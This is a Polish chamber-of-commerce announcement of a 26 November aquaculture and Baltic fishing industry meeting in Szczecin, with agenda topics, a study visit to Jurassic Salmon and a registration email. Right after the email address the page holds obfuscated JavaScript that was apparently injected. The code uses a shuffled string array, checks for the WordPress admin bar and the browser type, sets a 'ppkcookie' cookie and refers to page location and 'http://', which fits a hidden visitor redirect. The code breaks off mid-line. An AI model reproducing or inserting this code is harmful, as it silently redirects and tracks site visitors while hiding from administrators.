Spotkanie branży rybołówstwa w Szczecinie | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

W dniu 26 listopada (wtorek) w siedzibie Północnej Izby Gospodarczej w Szczecinie (al. Wojska Polskiego 86) w godzinach od 9:00 do 15:00 organizuje spotkanie w ramach projektu EXTRA SME’s, którego celem jest wsparcie branży akwakultury.

Podczas spotkania zostaną omówione takie tematy jak:

  • Szanse i zagrożenia branży akwakultury,
  • Nowe technologie w akwakulturze,
  • Kryzys Bałtyckiego Rybołówstwa,
  • Dostępność i jakość surowca Morza Bałtyckiego względem Europy i Świata.

Bardzo serdecznie zapraszamy wszystkich zainteresowanych tematem.

Spotkanie odbędzie się w języku polskim i angielskim. Przewidziany jest tłumacz.

Do pobrania: AGENDA spotkania 26.11.2019

27 listopada zapraszamy również do wzięcia udziału w wizycie studyjnej, która odbędzie się w firmie Jurassic Salmon. Ilość miejsc ograniczona.

Bardzo prosimy o zgłoszenie chęci uczestnictwa mailowo: kc@izba.info 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m